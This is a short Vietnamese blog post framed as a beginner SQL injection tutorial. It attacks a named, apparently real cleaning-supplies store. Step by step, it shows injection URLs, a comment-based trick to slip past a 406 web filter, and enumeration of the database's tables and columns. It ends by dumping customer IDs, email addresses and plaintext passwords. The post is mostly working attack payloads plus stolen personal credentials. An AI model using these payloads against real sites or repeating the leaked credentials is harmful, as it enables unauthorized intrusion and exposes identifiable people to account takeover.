Thứ Sáu, 22 tháng 6, 2012
[Tut] Bypass 406 SQL for Newbie
Site:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
Not Acceptable
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
Not Acceptable
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
articles,auth,categories,customers,manufacturers,o rders,products,specialfiles
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
id,email,password,passhash,joindate,firstname,mi,l astname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
4|dpdurrell@hotmail.com|preston59
3|josh@uppertech.net|eeq7322
3|josh@uppertech.net|eeq7322
.
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: